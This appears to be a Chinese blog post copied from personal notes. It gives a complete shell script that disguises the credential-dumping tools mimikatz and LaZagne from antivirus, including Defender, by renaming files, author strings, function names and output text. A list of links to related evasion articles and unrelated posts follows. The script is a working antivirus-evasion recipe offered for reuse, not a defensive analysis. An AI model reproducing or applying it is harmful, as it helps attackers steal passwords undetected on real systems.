其实现在的杀软还是玩的老一套,改改特征字符就能过了,最新的defender能用这个方法过

文章直接从笔记复制出来的,有需要的自己看情况用

git clone https://github.com/gentilkiwi/mimikatz.git lmmg
mv lmmg/mimikatz lmmg/lmmg
find lmmg/ -type f -name '*mimikatz*' | while read FILE ; do
newfile="$(echo ${FILE} |sed -e 's/mimikatz/windows/g')";
mv "${FILE}" "${newfile}";
done
find lmmg/ -type f -name '*kiwi*' | while read FILE ; do
newfile="$(echo ${FILE} |sed -e 's/kiwi/onedrive/g')";
mv "${FILE}" "${newfile}";
done
find lmmg/ -type f -print0 | xargs - sed -i 's/mimikatz/windows/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/MIMIKATZ/WINDOWS/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/Mimikatz/Windows/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/DELPY/gweep/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/Benjamin/gweeperx/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/benjamin@gentilkiwi.com/@gweeperx/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/creativecommons/notcommons/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/gentilkiwi/MSOffice/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/KIWI/ONEDRIVE/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/Kiwi/Onedrive/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/kiwi/onedrive/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/DumpCreds/DumpCred/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/logonPasswords/logonPassword/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/ArgumentPtr/NotTodayPal/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' cd ./lmmg/lmmg/
sed -i "0,/#if \!defined(_POWERKATZ)/! {0,/#if \!defined(_POWERKATZ)/ s/#if \!defined(_POWERKATZ)/\/*\r\n#if \!defined(_POWERKATZ)/}" windows.c
sed -i "0,/#endif/! {0,/#endif/! {0,/#endif/ s/#endif/#endif\r\n*\//}}" windows.c lazagne
find ./Windows/ -type f -name '*lazagne*' | while read FILE ; do
newfile="$(echo ${FILE} |sed -e 's/lazagne/kmm/g')";
mv "${FILE}" "${newfile}";
done find ./Windows/ -type d -name '*lazagne*' | while read FILE ; do
newfile="$(echo ${FILE} |sed -e 's/lazagne/kmm/g')";
mv "${FILE}" "${newfile}";
done find ./Windows/ -type f -name '*LaZagne*' | while read FILE ; do
newfile="$(echo ${FILE} |sed -e 's/LaZagne/Kmm/g')";
mv "${FILE}" "${newfile}";
done find ./Windows/ -type d -name '*LaZagne*' | while read FILE ; do
newfile="$(echo ${FILE} |sed -e 's/LaZagne/Kmm/g')";
mv "${FILE}" "${newfile}";
done
find ./Windows/ -type f -name '*laZagne*' | while read FILE ; do
newfile="$(echo ${FILE} |sed -e 's/laZagne/KMm/g')";
mv "${FILE}" "${newfile}";
done find ./Windows/ -type d -name '*laZagne*' | while read FILE ; do
newfile="$(echo ${FILE} |sed -e 's/laZagne/KMm/g')";
mv "${FILE}" "${newfile}";
done find windows/ -type f -print0 | xargs - sed -i 's/lazagne/kmm/g'
find windows/ -type f -print0 | xargs - sed -i 's/LaZagne/Kmm/g'
find windows/ -type f -print0 | xargs - sed -i 's/laZagne/KMm/g' find windows/ -type f -print0 | xargs - sed -i 's/BANG/bg/g'
find windows/ -type f -print0 | xargs - sed -i 's/passwords ---------------/vp/g'
find windows/ -type f -print0 | xargs - sed -i 's/Password not found/nop/g'
find windows/ -type f -print0 | xargs - sed -i 's/=================================================================/ll/g'
find windows/ -type f -print0 | xargs - sed -i 's/########## User/lp/g'
find windows/ -type f -print0 | xargs - sed -i 's/For more information launch it again with the -v option/jj/g'

关于mimikatz lazagne免杀方法的更多相关文章

  1. Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结

    Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结 1. ,免杀技术的用途2 1.1. 病毒木马的编写2 1.2. 软件保护所用的加密产品(比如壳)中,有 ...

  2. lcx源代码以及免杀的研究

    之前和Random大神讨论了一下免杀的问题,他给出了一个比较不错的想法,使用debug版本发布可以过很多杀软.顺便看了下lcx的源码,发现其代码不算特别复杂,于是乎就在这分析一下. 报毒情况 因为使用 ...

  3. 2018-2019-2 网络对抗技术 20165231 Exp3 免杀原理与实践

    实践内容(3.5分) 1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcod ...

  4. 2018-2019-2 网络对抗技术 20165323 Exp3 免杀原理与实践

    一.实践内容 1.1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程 1.2 通过组合应用各种技术实现恶意代码免杀 ( ...

  5. 2018-2019-3 网络对抗技术 20165235 Exp3 免杀原理与实践

    2018-2019-3 网络对抗技术 20165235 Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 1.对某个文件的特征码进行分析,(特征码就是一类恶意文件中经常出现的一段代 ...

  6. 2018-2019-2 网络对抗技术 20165311 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165311 Exp3 免杀原理与实践 免杀原理及基础问题回答 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil- ...

  7. 2018-2019-2 网络对抗技术 20165236 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165236 Exp3 免杀原理与实践 一.实践内容(3.5分) 1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5 ...

  8. NetSec2019 20165327 Exp3 免杀原理与实践

    NetSec2019 20165327 Exp3 免杀原理与实践 pre基础问题回答 一.免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术. 要做好免杀,就时清 ...

  9. 2018-2019-2 网络对抗技术 20165326 Exp3 免杀原理与实践

    免杀原理与实践 目录 知识点问答 实践内容 遇到的问题 心得体会 知识点 meterpreter免杀 基础问题回答 杀软是如何检测出恶意代码的? 特征码(基于签名):模式匹配,比对特征码库 启发式:通 ...

随机推荐

  1. Openshift yum安装

    Openshift yum安装: Yum 安装docker [root@DockerServer openshift]# yum repolist [root@DockerServer openshi ...

  2. Springboot + Mysql8实现读写分离

    在实际的生产环境中,为了确保数据库的稳定性,我们一般会给数据库配置双机热备机制,这样在master数据库崩溃后,slave数据库可以立即切换成主数据库,通过主从复制的方式将数据从主库同步至从库,在业务 ...

  3. 线程、进程概念与Android系统组件的关系

    Android系统是Google公司基于Linux内核开发的开源手机操作系统.通过利用 Linux 内核的优势,Android 系统使用了大量操作系统服务,包括进程管理.内存管理.网络堆栈.驱动程序. ...

  4. python3 中的reload(sys)和sys.setdefaultencoding('utf-8')

    通常我们为了防止出现乱码会进行一下操作 import sys reload(sys) sys.setdefaultencoding('utf-8') 但这是python2的写法,但是在python3中 ...

  5. display:box和display:flex属性介绍

    1.display:box 父容器里面的box属性有box-orient|box-dirextion|box-align|box-pack|box-lines box-orient:用来确定父容器里面 ...

  6. 记录一次Metaspace扩容引发FGC的调优总结

    开始之前 在开始之前先记录一个我碰到的jvm调优的坑.那就是… 为啥我配置到idea64exe.vmoptions中的参数没有生效??? 由于之前一直是在mac上开发,本地开发时当需要优化jvm参数的 ...

  7. Numpy数组解惑

    参考: 理解numpy的rollaxis与swapaxes函数:https://blog.csdn.net/liaoyuecai/article/details/80193996 Numpy数组解惑: ...

  8. ZGC gc策略及回收过程-源码分析

    源码文件:/src/hotspot/share/gc/z/zDirector.cpp 一.回收策略 main入口函数: void ZDirector::run_service() { // Main ...

  9. 算法学习之剑指offer(十二)

    一 题目描述 请设计一个函数,用来判断在一个矩阵中是否存在一条包含某字符串所有字符的路径.路径可以从矩阵中的任意一个格子开始,每一步可以在矩阵中向左,向右,向上,向下移动一个格子.如果一条路径经过了矩 ...

  10. JZ2440 u-boot-2016.11、linux-4.17和busybox-1.28.4移植笔记

    2018年5月份开始在JZ2440上陆续移植了u-boot-2016.11.u-boot-spl-2016.11.linux-4.17和busybox-1.28.4,其中linux-4.17和busy ...